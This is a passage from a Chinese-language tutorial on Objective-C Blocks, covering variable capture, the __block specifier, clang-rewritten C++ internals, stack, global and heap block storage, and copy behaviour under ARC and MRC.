    typedef int ^(Blk_t)(int); //声明一个Blk_t类型的block
    Blk_t blck = ^{
    }
    
    //作为函数参数和返回值就可以简化为
    void func(Blk_t blck){
    
    }
    
    //作为函数返回值时可以简化为
    Blk_t func1(){
    
    }
    

2.3. 截获自动变量值

void test1(void){
   //默认为auto修饰局部变量
   int a = 1;
   void (^bck1)(void)=^(){
       NSLog(@"访问量局部变量a:%d",a);
   };
    a = 2;
    NSLog(@"访问量局部变量a1:%d",a);
   bck1();
}
//访问量局部变量a1:2
//访问量局部变量a:1

block访问局部变量 auto修饰,此时block截获了变量a的当前的瞬间值,底层为值传递,所以block内部不能直接赋值修改,block外侧修改了局部变量,block内部变量值不会修改。

如果在block内部尝试修改局部变量会报错

image-20251223下午31225845

报错信息:变量不可赋值(缺少__block类型说明符)

Variable is not assignable (missing __block type specifier)

2.4. __block 说明符

__block说明符更准确的描述方式为“__block存储域类说明符” __block storage-class-specifier,c语言的存储域类说明符右以下几种:

  • typedef
  • extern
  • static
  • auto
  • register

__block类似于static、auto、register等说明符。用于指定将变量值设置到哪个存储域中,例如auto作为自动变量存储在栈中,static表示作为静态变量存储在数据区中。

如果非要在block内部修改局部变量,就需要再局部变量前通过__block修饰

void test1(void){
   //默认为auto修饰局部变量
   __block int a = 1;
   void (^bck1)(void)=^(){
       NSLog(@"访问量局部变量修改前a:%d",a);
       a = 3;
       NSLog(@"访问量局部变量修改后a:%d",a);
   };
    a = 2;
    NSLog(@"访问量局部变量a1:%d",a);
   bck1();
}
//访问量局部变量a1:2
//访问量局部变量修改前a:2
//访问量局部变量修改后a:3

2.5.截获的自动变量

block截获自动变量会报错,那截获OC对象呢,比如NSMutableArray还会报错吗?

//截获可变数组,
void test11(void){
   //默认为auto修饰局部变量
    NSMutableArray *array = [NSMutableArray array];
   void (^bck1)(void)=^(){
       [array addObject:[[NSObject alloc]init]];
       NSLog(@"访问量局部变量array.count:%lu",(unsigned long)array.count);
   };
    NSLog(@"访问量局部变量array1.count:%lu",(unsigned long)array.count);
   bck1();
}
//访问量局部变量array1.count:0
//访问量局部变量array.count:1

此时block截获的变量值是NSMutableArray类对象,及NSMutableArray类对象的结构体实例指针,因此,对变量值进行addObject操作,是没有影响的,如果在block内部,要对array进行赋值时是不行的。依然需要用__block修饰

image-20251223下午33532635

使用c语言的数组时必须小心使用其指针,下面这个例子,看似并没有像截获的自动变量text赋值,但还是编译不通过,报错信息:Cannot refer to declaration with an array type inside block(不能引用块内数组类型的声明)

image-20251223下午34352216

需要把text声明为指针来解决

void test111(void){
   //使用c语言的数组时必须小心使用其指针,
   const char *text = "hello";
   void (^bck1)(void)=^(){
       //截获自动变量的方法并没有实现对c语言数组的截获,此时需要用指针来解决该问题
       NSLog(@"截获的局部变量:%c",text[2]);
   };
   bck1();
}

三、Block的底层实现

3.1、Block的实质

一开始讲了Blocks是带有局部变量匿名函数,但是Block实质究竟是什么,类型、 变量、还是其他什么?

先说结论:Block其实是一个对象。因为它的结构体里有isa指针

为了探究到底,我们需要通过clang 把oc转为c++源码来探个究竟

进入main.m的文件夹下,执行:clang -rewrite-objc main.m

image-20251223下午43004746

执行后,会生成一个main.cpp文件

image-20251223下午44246125

  • 转换前的oc代码

    //为了简化生成的c++代码,把原来oc代码的main方法传参(int argc, const char * argv[])省略。以及
    int main(void) {
            void (^donyBck)(void)=^(){
                //这里的日志用英文,转c++后,不会转义,方便查看,中文的话,会转义,不方便查看
                NSLog(@"The block prints logs internally");
            };
            //donyBck的调用
            donyBck();
        return 0;
    }
    
  • 转换后的C++源码

    //包含block实际函数指针的结构体
    struct __block_impl {
      void *isa; //有isa
      int Flags;
      int Reserved;  //今后升级所需区域大小
      void *FuncPtr; //函数指针
    };
    
    //
    static __NSConstantStringImpl __NSConstantStringImpl__var_folders_d__csgptyg57sqczzwhcvq7mcpr0000gn_T_main_5a37bd_mi_0 __attribute__ ((section ("__DATA, __cfstring"))) = {__CFConstantStringClassReference,0x000007c8,"The block prints logs internally",32};
    
    //block结构体
    struct __main_block_impl_0 {
      struct __block_impl impl; //Block的实际指针,
      struct __main_block_desc_0* Desc;
      //block构造函数
      __main_block_impl_0(void *fp, struct __main_block_desc_0 *desc, int flags=0) {
        impl.isa = &_NSConcreteStackBlock; //isa指针 默认block创建在栈上
        impl.Flags = flags; //block标志位
        impl.FuncPtr = fp; //Block执行的函数指针
        Desc = desc; //Block描述信息,Block大小等元信息
      }
    };
    
    //Block内部函数调用
    /* 
    void (^donyBck)(void)=^(){
                //这里的日志用英文,转c++后,不会转义,方便查看,中文的话,会转义,不方便查看
                NSLog(@"The block prints logs internally");
            };
    */
    static void __main_block_func_0(struct __main_block_impl_0 *__cself) {
    
                NSLog((NSString *)&__NSConstantStringImpl__var_folders_d__csgptyg57sqczzwhcvq7mcpr0000gn_T_main_5a37bd_mi_0);
            }
    
    //Block底层编译后自动生成的,Block描述信息结构体变量,静态匿名结构体+变量
    static struct __main_block_desc_0 {
      size_t reserved; //成员1 :保留字段
      size_t Block_size; //成员2:Block实例的内存大小
    } __main_block_desc_0_DATA = { //初始化变量
      0, //给Reserved赋值
      sizeof(struct __main_block_impl_0) //给Block——size赋值
    };
    
    
    //main函数
    int main(void) {
      //1.构造block对象,并将其强制转换为无参无返回值的函数指针。
        void (*donyBck)(void)=((void (*)())&__main_block_impl_0(
          (void *)__main_block_func_0, //block要执行的代码逻辑(函数指针)->FuncPtr
          &__main_block_desc_0_DATA //block的描述信息(版本,大小等)
        ));
      
      //2.调用block的核心逻辑(donyBck的调用)
      // ((void (*))(donyBck):将函数指针转回Block结构体指针
      //->FuncPtr :取出Block的执行函数指针
      //最后调用该函数,并传入Block自身作为参数,(block的隐式self)
       ((void (*)(__block_impl *))((__block_impl *)donyBck)->FuncPtr)((__block_impl *)donyBck);
        return 0;
    }
    

3.2 、源码分析

3.2.1 Block结构体-__main_block_impl_0

先看看 __main_block_impl_0 结构体

//block结构体
struct __main_block_impl_0 {
  struct __block_impl impl; //Block的实际指针,
  struct __main_block_desc_0* Desc;
  //block构造函数
  __main_block_impl_0(void *fp, struct __main_block_desc_0 *desc, int flags=0) {
    impl.isa = &_NSConcreteStackBlock; //isa指针 默认block创建在栈上
    impl.Flags = flags; //block标志位
    impl.FuncPtr = fp; //Block执行的函数指针
    Desc = desc; //Block描述信息,Block大小等元信息
  }
};

从源码里可以看出,__main_block_impl_0结构体,包含三部分

  • 成员变量 impl,是结构体__block_impl

  • 成员变量 Desc指针,是结构体 __main_block_desc_0

  • __main_block_impl_0 构造函数

分别分析一下这三部分

3.2.1.1 struct __block_impl impl
//包含block实际函数指针的结构体
struct __block_impl {
  void *isa; //有isa
  int Flags;  //标志位
  int Reserved;  //今后升级所需区域大小
  void *FuncPtr; //函数指针
};
  • isa指针,保存Block结构体的实例指针
  • Flags 标志位
  • Reserved 后续版本升级所需区域大小
  • FuncPtr 函数指针,指向了Block的主体部分,也及时对应oc代码里的 { NSLog(@"The block prints logs internally");};

3.1.1里的__main_block_impl_0 里的impl 是__block_impl结构体,而__block_impl 包含了Block实际函数指针 FuncPtr

总结:impl 主要就是包含了Block的函数指针 FuncPtr

3.2.1.2 struct __main_block_desc_0* Desc
//Block底层编译后自动生成的,Block描述信息结构体变量,静态匿名结构体+变量
static struct __main_block_desc_0 {
  size_t reserved; //成员1 :保留字段
  size_t Block_size; //成员2:Block实例的内存大小
} __main_block_desc_0_DATA = { //初始化变量
  0, //给Reserved赋值
  sizeof(struct __main_block_impl_0) //给Block——size赋值
};
  • reserved 版本升级后所需的区域大小
  • Block_size Block的大小。

总结:__main_block_desc_0是block的描述信息,也就是附加信息

3.2.1.3 __main_block_impl_0构造函数
 //block构造函数
  __main_block_impl_0(void *fp, struct __main_block_desc_0 *desc, int flags=0) {
    impl.isa = &_NSConcreteStackBlock; //isa指针 默认block创建在栈上
    impl.Flags = flags; //block标志位
    impl.FuncPtr = fp; //Block执行的函数指针
    Desc = desc; //Block描述信息,Block大小等元信息
  }

传三个参数:

  • void *fp :主要赋值给impl的FuncPtr ,Block执行的函数指针
  • struct __main_block_desc_0 *desc, Block的描述信息
  • int flags=0 ,默认值为0,标志位。

总结:构造函数主要用来初始化__block_impl的成员变量,以及把描述信息赋值给Desc

3.2.1.4 在main方法里的过程

关于:__main_block_impl_0 基本概念就了解完了,那在main方法里,__main_block_impl_0 又是怎么赋值的呢

//原函数
 void (^donyBck)(void)=^(){
            //这里的日志用英文,转c++后,不会转义,方便查看,中文的话,会转义,不方便查看
            NSLog(@"The block prints logs internally");
 };

//转换c++后
//1.构造block对象,并将其强制转换为无参无返回值的函数指针。
    void (*donyBck)(void)=((void (*)())&__main_block_impl_0(
      (void *)__main_block_func_0, //block要执行的代码逻辑(函数指针)->FuncPtr
      &__main_block_desc_0_DATA //block的描述信息(版本,大小等)
    ));

可以看出通过 __main_block_impl_0构造函数,生成 __main_block_impl_0结构体(Block结构体)的实例指针,并赋值给donyBck

然后对 __main_block_impl_0构造函数传了两个参数

  • __main_block_func_0

    //Block内部函数调用
    static void __main_block_func_0(struct __main_block_impl_0 *__cself) {
    //对应的就是原oc  NSLog(@"The block prints logs internally");
       NSLog((NSString *)&__NSConstantStringImpl__var_folders_d__csgptyg57sqczzwhcvq7mcpr0000gn_T_main_5a37bd_mi_0);
    }
    

    可以看出 对应的是oc block的主体部分也就是 {NSLog(@"The block prints logs internally"); };

    这里的参数 __cself就是指向Block的值的指针变量,相当于oc的self;

    🎯这里画个重点:从这里可以看出,block内部,把block的^{}执行函数{}在Block定义完后,当成一个参数类型为__main_block_func_0传入到 __main_block_impl_0->__block_impl-> FuncPtr 里了。

  • __main_block_desc_0_DATA

    __main_block_desc_0_DATA 是包含了Block的描述信息,

    static struct __main_block_desc_0{
      size_t reserved; //成员1 :保留字段
      size_t Block_size; //成员2:Block实例的内存大小
    } __main_block_desc_0_DATA = { //初始化变量
      0, //给Reserved赋值
      sizeof(struct __main_block_impl_0) //给Block——size赋值
    };
    

3.2.2 总结

至此Block的内部原理就浮出水面了。

Block内部是由 __main_block_impl_0结构体组成的,内部isa指针,指向所属类的结构体的实例指针,_NSConcreteStackBlock相当于Block的结构体实例,对象impl.isa = &_NSConcreteStackBlock ,将Block结构体的指针赋值给impl的成员变量isa ,相当于Block结构体成员变量保存了Block结构体的指针,和OC的对象处理方式是一致的。

所以Block的实质就是对象,和NSObject一样,都是对象。

image-20251225上午114937229

3.3 Block截获局部变量和特殊区域变量

3.3.1 Block截获局部变量的实质

在2.3里我们知道了Block可以截获局部变量,那背后Block是怎么截获的,为什么不能在block内部直接修改截获的局部变量呢?

先说结论:Block截获的局部变量是值传递的方式传入Block结构体中,并保存为Block的成员变量。因此当外部局部变量值发生修改后,Block内部对应的成员变量的值并没有发生改变。

为了探究到底,我们需要通过clang 把oc转为c++源码来探个究竟

进入main.m的文件夹下,执行:clang -rewrite-objc main.m

  • oc代码

    int main(void) {
        int a = 2;
        void (^donyBck)(void)=^(){
            NSLog(@"The block Capture local variables:%d",a);
        };
        
        a = 4;
        //donyBck的调用
        donyBck();
        NSLog(@"The block prints local variables:%d",a);
        return 0;
    }
    //The block Capture local variables:2
    //The block prints local variables:4
    
  • 转c++源代码

    //block结构体
    struct __main_block_impl_0 {
      struct __block_impl impl;
      struct __main_block_desc_0* Desc;
      int a; //截获的局部变量,在block内部变成了成员变量
      __main_block_impl_0(void *fp, struct __main_block_desc_0 *desc, int _a, int flags=0) : a(_a) {
        impl.isa = &_NSConcreteStackBlock;
        impl.Flags = flags;
        impl.FuncPtr = fp;
        Desc = desc;
      }
    };
    
    //block执行函数
    static void __main_block_func_0(struct __main_block_impl_0 *__cself) {
      int a = __cself->a; // bound by copy
    
            NSLog((NSString *)&__NSConstantStringImpl__var_folders_d__csgptyg57sqczzwhcvq7mcpr0000gn_T_main_268414_mi_1,a);
        }
    
    static struct __main_block_desc_0 {
      size_t reserved;
      size_t Block_size;
    } __main_block_desc_0_DATA = { 
    0, 
    sizeof(struct __main_block_impl_0)};
    
    
    int main(void) {
        int a = 2;
    
        //block定义
        void (*donyBck)(void)=((void (*)())&__main_block_impl_0(
        (void *)__main_block_func_0,
         &__main_block_desc_0_DATA, 
         a));
    
        a = 4;
    
        //block 执行方法
        ((void (*)(__block_impl *))((__block_impl *)donyBck)->FuncPtr)(
        (__block_impl *)donyBck
        );
      //打印
        NSLog((NSString *)&__NSConstantStringImpl__var_folders_d__csgptyg57sqczzwhcvq7mcpr0000gn_T_main_268414_mi_2,a);
        return 0;
    }
    
    • 从源码可以看出,结构体__main_block_impl_0 多了一个成员变量a,这个变量就是Block捕获的局部变量
    • 方法__main_block_func_0 看出 int a = __cself->a在block内部访问这个变量a时,通过值传递的方式,而不是指针传递,这也就说明了a是block的内部变量,外部修改a,Block内部捕获的a是不会发生变化的。

3.3.2 使用__block说明符更改局部变量

那使用__block来修饰局部变量后,就能让Block内部来修改这个变量,那背后__block 又做了什么呢?

先说结论:通过 __block修饰后,使这个局部变量在block内部通过指针传递,所以修饰后的局部变量,在block内部可以修改了

为了探究到底,我们需要通过clang 把oc转为c++源码来探个究竟

进入main.m的文件夹下,执行:clang -rewrite-objc main.m

  • oc代码

    int main(void) {
        __block int a = 2;
        void (^donyBck)(void)=^(){
            a = 3;
            NSLog(@"The block Capture local variables:%d",a);
        };
        
        a = 4;
        //donyBck的调用
        donyBck();
        NSLog(@"The block prints local variables:%d",a);
        return 0;
    }
    
  • c++代码

    //__block修饰的
    struct __Block_byref_a_0 {
      void *__isa; //isa指针
    __Block_byref_a_0 *__forwarding; //传入变量的地址
     int __flags; //标志位
     int __size; //结构体大小
     int a; //存放变量a的实际的值,相当与原局部变量的成员变量。
    };
    
    //block内部
    struct __main_block_impl_0 {
      struct __block_impl impl;
      struct __main_block_desc_0* Desc;
      __Block_byref_a_0 *a; // by ref //加入__Block修饰后,这里的a是__Block_byref_a_0类型了
      __main_block_impl_0(void *fp, struct __main_block_desc_0 *desc, __Block_byref_a_0 *_a, int flags=0) : a(_a->__forwarding) {
        impl.isa = &_NSConcreteStackBlock; //栈block
        impl.Flags = flags;
        impl.FuncPtr = fp;
        Desc = desc;
      }
    };
    
    //block执行函数
    static void __main_block_func_0(struct  __main_block_impl_0 *__cself) {
      __Block_byref_a_0 *a = __cself->a; // bound by ref 
            (a->__forwarding->a) = 3;
            NSLog((NSString *)&__NSConstantStringImpl__var_folders_d__csgptyg57sqczzwhcvq7mcpr0000gn_T_main_3b64fc_mi_3,(a->__forwarding->a));
        }
    
    //新增了 
    static void __main_block_copy_0(struct __main_block_impl_0*dst, struct __main_block_impl_0*src) {
        _Block_object_assign(
        (void*)&dst->a, 
        (void*)src->a,
         8/*BLOCK_FIELD_IS_BYREF*/);
    }
    
    //新增了
    static void __main_block_dispose_0(struct __main_block_impl_0*src) {
      _Block_object_dispose((void*)src->a, 
                            8/*BLOCK_FIELD_IS_BYREF*/);
    }
    
    static struct __main_block_desc_0 {
      size_t reserved;
      size_t Block_size;
      void (*copy)(struct __main_block_impl_0*, struct __main_block_impl_0*);
      void (*dispose)(struct __main_block_impl_0*);
    } __main_block_desc_0_DATA = { 
        0, 
        sizeof(struct __main_block_impl_0),
         __main_block_copy_0,
          __main_block_dispose_0
    };
    
    //main函数
    int main(void) {
      
      //__block修饰的局部变量a
        __attribute__((__blocks__(byref))) __Block_byref_a_0 a = {
          (void*)0,
          (__Block_byref_a_0 *)&a, 
          0, 
          sizeof(__Block_byref_a_0), 
          2};
        
        void (*donyBck)(void)=((void (*)())&__main_block_impl_0(
          (void *)__main_block_func_0, 
          &__main_block_desc_0_DATA, 
          (__Block_byref_a_0 *)&a, 
          570425344));
    
      //修改局部变量a的值
      (a.__forwarding->a) = 4;
      
      //block调用
        ((void (*)(__block_impl *))((__block_impl *)donyBck)->FuncPtr)((__block_impl *)donyBck);
      
      //block打印
        NSLog((NSString *)&__NSConstantStringImpl__var_folders_d__csgptyg57sqczzwhcvq7mcpr0000gn_T_main_3b64fc_mi_4,(a.__forwarding->a));
        return 0;
    }
    
    

    可以看出局部变量a加上 __block后,c++代码里新增了 __Block_byref_a_0__main_block_copy_0__main_block_dispose_0

    • 从结构体 __main_block_impl_0 可以看出原来oc的 被__block修饰后的局部变量a,在结构体__main_block_impl_0内部变成了 __Block_byref_a_0 *a,也就是说Block内部的结构体__main_block_impl_0实例持有指向__block变量的__Block_byref_a_0结构体实例指针。
    • __main_block_copy_0__main_block_dispose_0留在后面在说。

这里有点绕,我们用白话文理解一下

可以把整个过程想象成寄送一个易碎品(变量a)

角色 对应代码 比喻说明
易碎品本身 局部变量 int a = 2 比如一个玻璃杯。
加固包装盒 __Block_byref_a_0结构体 一个专门用来固定玻璃杯的防震包装盒。
快递单/指针 __Block_byref_a_0 *a(Block结构体里的成员) 一张写着包装盒地址的快递单。
整个Block __main_block_impl_0结构体实例 快递仓库。
🎯 整个过程是这样的:
  1. 打包: 当你用 __block修饰变量 a时,编译器会自动创建一个“包装盒”(__Block_byref_a_0结构体),然后把你的变量 a(玻璃杯)放进这个盒子里。
  2. 填写快递单: Block(快递仓库)想要操作这个玻璃杯,但它并不直接把玻璃杯拿进来(那样就成了它的私有物品,无法和外界共享了)。Instead,它只拿了一张写着“包装盒地址”的快递单(即指针 __Block_byref_a_0 *a)。
  3. 共享修改: 当Block内部或外部代码需要修改 a的值时,它们会凭着这张“快递单”找到同一个“包装盒”,然后打开盒子修改里面的玻璃杯。因为大家访问的是同一个盒子里的东西,所以任何一方的修改,另一方都能立刻看到

白话文总结:被__block修饰后的变量a,在Block内并没有直接把变量装在自己口袋里,而是记下了变量所在包装盒的地址。通过这个共享的地址,Block和外部代码就能共同修改同一个变量了。

在看看__Block_byref_a_0 结构体

//__block修饰的
struct __Block_byref_a_0 {
  void *__isa; //isa指针
__Block_byref_a_0 *__forwarding; //传入变量的地址
 int __flags; //标志位
 int __size; //结构体大小
 int a; //存放变量a的实际的值,相当与原局部变量的成员变量。
};

在看一下在main()中原oc代码为

     __block int a = 2;

转为c++为

    //__block修饰的局部变量a
    __attribute__((__blocks__(byref))) __Block_byref_a_0 a = {
      (void*)0,
      (__Block_byref_a_0 *)&a, 
      0, 
      sizeof(__Block_byref_a_0), 
      2};

从赋值里可以看出在main()__block修饰后的变量a,底层赋值给__Block_byref_a_0结构体时,传入的值如下

  • isa传入空

  • __forwarding 传入了局部变量a的本身地址

  • __flags :分配了0

  • sizeof:结构体的大小

  • a值赋值为2.

    image-20251225下午44345718

总结一下:到此知道了__forwarding就是局部变量a的本身地址,可以通过 __forwarding指针来访问局部变量。同时也能对其修改了。

    //block执行函数
    static void __main_block_func_0(struct  __main_block_impl_0 *__cself) {
      __Block_byref_a_0 *a = __cself->a; // bound by ref 
            (a->__forwarding->a) = 3;
            NSLog((NSString *)&__NSConstantStringImpl__var_folders_d__csgptyg57sqczzwhcvq7mcpr0000gn_T_main_3b64fc_mi_3,(a->__forwarding->a));
        }

可以看出 (a->__forwarding->a) = 3;,是通过指针取值的方式来改变局部变量的值,

🎯总结:

从而解释了通过__block修饰后的变量,在Block内部通过指针传递的方式修改局部变量

另外__block__Block_byref_a_0 结构体并不在Block的 __main_block_impl_0结构体中,这样做是为了多个Block同时使用__block变量。

  • 继续看一下OC代码

            int main(void) {
                    //__block被多个Block使用
                __block int aa = 2;
    
                void (^donyBck)(void)=^(){
                    aa = 3;
                    NSLog(@"The block Capture local variables:%d",aa);
                };
    
                void (^donyBck1)(void)=^(){
                    aa = 4;
                    NSLog(@"The block Capture local variables1:%d",aa);
                };
            }
    
  • 转换为c++

      //__block修饰后
      __Block_byref_aa_0 aa = {
         0,
         &aa, 
         0, 
         sizeof(__Block_byref_aa_0), 2};
         //donyBck
         donyBck)=&__main_block_impl_0(
            __main_block_func_0, 
            &__main_block_desc_0_DATA, 
            (__Block_byref_aa_0 *)&aa, 
            570425344));
            //donyBck1
          donyBck1)=&__main_block_impl_1(
            __main_block_func_1, 
            &__main_block_desc_1_DATA, 
            (__Block_byref_aa_0 *)&aa, 
            570425344));
    

可以看出donyBckdonyBck1 都是用了__Block_byref_aa_0结构体的实例aa的指针。反过来一个block中使用多个 __block也是可以的。

3.3.3 更改特殊区域变量值

除了通过__block修饰局部变量外,其他变量如静态局部变量、静态全局变量、全局变量能否在block内部进行修改?

为了探究到底,我们继续需要通过clang 把oc转为c++源码来探个究竟

进入main.m的文件夹下,执行:clang -rewrite-objc main.m

  • oc代码

    int global_a = 2;
    static int static_global_a = 3;
    int main(void) {
        static int static_a = 4;
        void (^donyBck)(void)=^(){
            global_a = 1;
            static_global_a = 2;
            static_a = 3;
            NSLog(@"The block Capture global_a:%d ,static_global_a:%d,static_a:%d",global_a,static_global_a,static_a);
        };
        
        //donyBck的调用
        donyBck();
        return 0;
    }
    
  • C++代码

    //全局变量
    int global_a = 2;
    //静态全局变量
    static int static_global_a = 3;
    
    struct __main_block_impl_0 {
      struct __block_impl impl;
      struct __main_block_desc_0* Desc;
      int *static_a; //静态局部变量
      __main_block_impl_0(void *fp, struct __main_block_desc_0 *desc, int *_static_a, int flags=0) : static_a(_static_a) {
        impl.isa = &_NSConcreteStackBlock;
        impl.Flags = flags;
        impl.FuncPtr = fp;
        Desc = desc;
      }
    };
    static void __main_block_func_0(struct __main_block_impl_0 *__cself) {
      int *static_a = __cself->static_a; // bound by copy
    
            global_a = 1;
            static_global_a = 2;
            (*static_a) = 3;
            NSLog((NSString *)&__NSConstantStringImpl__var_folders_d__csgptyg57sqczzwhcvq7mcpr0000gn_T_main_6417ea_mi_3,global_a,static_global_a,(*static_a));
        }
    
    static struct __main_block_desc_0 {
      size_t reserved;
      size_t Block_size;
    } __main_block_desc_0_DATA = { 0, sizeof(struct __main_block_impl_0)};
    int main(void) {
        static int static_a = 4;
        void (*donyBck)(void)=((void (*)())&__main_block_impl_0((void *)__main_block_func_0, &__main_block_desc_0_DATA, &static_a));
        ((void (*)(__block_impl *))((__block_impl *)donyBck)->FuncPtr)((__block_impl *)donyBck);
        return 0;
    }
    

    __main_block_impl_0可以看出,静态局部变量static_a以指针形式添加添加为成员变量,而静态全局变量 static_global_a 和全局变量global_a并没有添加到__main_block_impl_0内部。

    //全局变量
    int global_a = 2;
    //静态全局变量
    static int static_global_a = 3;
    
    struct __main_block_impl_0 {
      struct __block_impl impl;
      struct __main_block_desc_0* Desc;
      int *static_a; //静态局部变量
      __main_block_impl_0(void *fp, struct __main_block_desc_0 *desc, int *_static_a, int flags=0) : static_a(_static_a) {
        impl.isa = &_NSConcreteStackBlock;
        impl.Flags = flags;
        impl.FuncPtr = fp;
        Desc = desc;
      }
    };
    

    再从__main_block_func_0,可以看出全局变量global_a和全局静态变量static_global_a是在block内部访问直接访问的,而静态局部变量static_a是通过指针传递的方式进行访问和赋值的。

    static void __main_block_func_0(struct __main_block_impl_0 *__cself) {
      int *static_a = __cself->static_a; // bound by copy
    
            global_a = 1; //全局变量
            static_global_a = 2; //全局静态变量
            (*static_a) = 3; //局部静态变量
            NSLog((NSString *)&__NSConstantStringImpl__var_folders_d__csgptyg57sqczzwhcvq7mcpr0000gn_T_main_6417ea_mi_3,global_a,static_global_a,(*static_a));
        }
    

3.4 Block的存储域

在3.2 中的Block实质源码分析里,看出impl.isa = &_NSConcreteStackBlock; //栈block,可以看出该Block存储在栈区,那Block还可以存在哪个区呢?

先说结论:Block分别可以存储在_NSConcreteGlobalBlock_NSConcreteStackBlock_NSConcreteMallocBlock

设置对象的存储域
_NSConcreteGlobalBlock 数据区域(.data区)
_NSConcreteStackBlock
_NSConcreteMallocBlock

image-20251225下午74628893

3.4.1 _NSConcreteGlobalBlock

为了探究到底,我们继续需要通过clang 把oc转为c++源码来探个究竟

进入main.m的文件夹下,执行:clang -rewrite-objc main.m

  • oc代码

    //全局block
    void (^donyBck)(void) =^(){
        NSLog(@"global block");
    };
    
    int main(void) {
        donyBck();
        return 0;
    }
    
  • c++源码

    struct __donyBck_block_impl_0 {
      struct __block_impl impl;
      struct __donyBck_block_desc_0* Desc;
      __donyBck_block_impl_0(void *fp, struct __donyBck_block_desc_0 *desc, int flags=0) {
        impl.isa = &_NSConcreteGlobalBlock; //全局block
        impl.Flags = flags;
        impl.FuncPtr = fp;
        Desc = desc;
      }
    };
    

通过源码可以看出 impl.isa = &_NSConcreteGlobalBlock,说明该Block为 _NSConcreteGlobalBlock类型。

这里需要注意使用全局block时,因为本身已经在全局区域,所以不会捕获自动变量(局部变量),存储在数据区域

3.4.2 _NSConcreteStackBlock

除了全局block外,其他基本都存储在栈上,也就是StackBlock。

NSConcreteStackBlock类的block,存储在栈区,如果所属的变量作用域结束,该Block就会被废弃。由于 __block变量也配置在栈上,同样的所属变量作用域结束后,该 __block变量同样也被废弃。

image-20251226下午125508437

3.4.3 _NSConcreteMallocBlock

既然在栈上的Block在变量作用域结束后就立即被废弃,那如果不想废弃怎么办?

Block提供了 【复制copy】操作,可以将Block对象和 __block变量从栈区复制到堆区上,当Block从栈区复制到堆区后,即时变量作用域结束时,堆区上的Block和 __block还可以继续使用。

image-20251226下午10020548

此时的在堆区的Block就是_NSConcreteMallocBlock 对象,Block结构体成员变量isa赋值为 imp.isa = &_NSConcreteMallocBlock;

而此时被__block修饰的变量用结构体成员变量 __forwarding可以实现无论__block变量配置在堆上还是在栈上,都能够正确访问__block变量

3.5 Block的自动拷贝和手动拷贝

3.5.1 Block的自动拷贝

在ARC下,大多数情况下,编译器会自动进行判断,自动生成将Block从栈上复制到堆上的代码

  • 将Block作为函数返回值返回时,会自动拷贝

  • 向方法或函数的参数中传递Block时:(以下两种情况内部底层实现了copy操作,其他都需要手动拷贝)

    • Cocoa框架的方法且方法名中含有usingBlock等 如NSArray类的enumerateObjectsUsingBlock方法
    • GCD的API时如dispatch_async函数
    //在MRC下,initWithObjects后面的Block,编译器不会主动给Block添加copy操作,所以Block还存在栈上,所以会报错。
    //在ARC下,编译器主动添加了copy操作,此时的block被复制到堆上了。
    @implementation SDPerson
    
    - (id) getBlockArray{
        int val = 10;
      void (^blk0)(void) = ^{NSLog(@"blk0:%d",val);};
        void (^blk1)(void) = ^{NSLog(@"blk1:%d",val);};
        NSLog(@"blk01:%@",blk0);
      NSLog(@"blk02:%@",blk1);
        /*
      blk01:<__NSStackBlock__: 0x7ff7bfeff0d8>
    blk02:<__NSStackBlock__: 0x7ff7bfeff0a8>
      */
      //array 的initWithObjects 纯容器存储AIP,框架内部不会自动copy
      return [[NSArray alloc]initWithObjects:blk0,blk1, nil];
    }
    
    @end
    

    image-20251226下午45612397

    报错原因是:在执行完getBlockArray后栈上的Block被废弃,MRC 无任何自动优化,initWithObjects: 仅存栈 Block 指针 → 方法返回栈帧销毁 → 执行 Block 访问野内存 → 崩溃。此时我们需要手动复制下即可。

    修改一下getBlockArray,即可

    - (id) getBlockArray{
        int val = 10;
        
        void (^blk0)(void) = ^{NSLog(@"blk0:%d",val);};
        void (^blk1)(void) = ^{NSLog(@"blk1:%d",val);};
        blk0 = [blk0 copy];
        blk1 = [blk1 copy];
        NSLog(@"blk01:%@",blk0);
        NSLog(@"blk02:%@",blk1);
        //blk01:<__NSMallocBlock__: 0x600000c00540>
        //blk02:<__NSMallocBlock__: 0x600000c00570>
        return [[NSArray alloc]initWithObjects:blk0,blk1, nil];
    }
    
3.5.2 Block的手动拷贝

所有需要让 Block「脱离原栈帧存活」的场景,都必须手动调用[block copy]

关于Block不同类的拷贝效果总结如下

block类 副本源的存储域 复制效果
_NSConcreteStackBlock 栈区 从栈拷贝到堆区
_NSConcreteGlobalBlock 程序的数据区域 不做改变
_NSConcreteMallocBlock 堆区 引用计数增加

不管Block配置在何处,用copy复制不会引起任何问题,在不确定时,调用copy方法即可

3.6 __block变量存储域

在使用 __block变量的Block从栈复制到堆上,__block变量也受到了如下影响

__block变量的配置存储区域 Block从栈上复制到堆上时的影响
堆区 从栈复制到堆区,并被Block所持有
栈区 被Block所持有

和OC引用计数方式内存管理完全相同。

  • __block修饰的变量被Block所持有,如果Block废弃,持有的__block变量也跟着废弃

3.7 截获对象

在Block语法中使用局部变量array来添加元素。

理论上在变量作用域的同时,变量array被废弃,因此赋值给变量array的NSMutableArray类对象必定释放并废弃,但上述代码在main方法里的内{}外仍然可以执行,并打印日志。 这意味着array在Block的执行部分超出其变量作用域而存在。

先说结论:Block从栈复制到堆,归结为__Block_copy函数被调用,使__strong修饰的自动变量对象和__block修饰的变量,被堆上的Block所持有,所以可以超出其变量作用域而存在。

那我们转为c++代码再探个究竟

  • OC

    typedef int (^Blk_t)(id obj);
    Blk_t donyBck;
    
    int main(void) {
        
        {
            id array = [NSMutableArray array];
            donyBck = [^(id obj){
                [array addObject:obj];
                NSLog(@"access local variables array.count:%lu",[array count]);
            } copy];
        }
        
        donyBck([[NSObject alloc]init]);
        donyBck([[NSObject alloc]init]);
        donyBck([[NSObject alloc]init]);
        return 0;
    }
    /*
    access local variables array.count:1
    access local variables array.count:2
    access local variables array.count:3
    */
    
  • C++

    typedef int (*Blk_t)(id obj);
    Blk_t donyBck;
    
    //Block用的结构体
    struct __main_block_impl_0 {
      struct __block_impl impl;
      struct __main_block_desc_0* Desc;
      id array; //这里array被Block强引用 __strong
      __main_block_impl_0(void *fp, struct __main_block_desc_0 *desc, id _array, int flags=0) : array(_array) {
        impl.isa = &_NSConcreteStackBlock;
        impl.Flags = flags;
        impl.FuncPtr = fp;
        Desc = desc;
    }
    };
    
    //block执行方法
    static void __main_block_func_0(struct __main_block_impl_0 *__cself, id obj) {
      id array = __cself->array; // bound by copy
    
      //添加方法
                ((void (*)(id, SEL, ObjectType _Nonnull))(void *)objc_msgSend)((id)array, sel_registerName("addObject:"), (id)obj);
      //打印日志
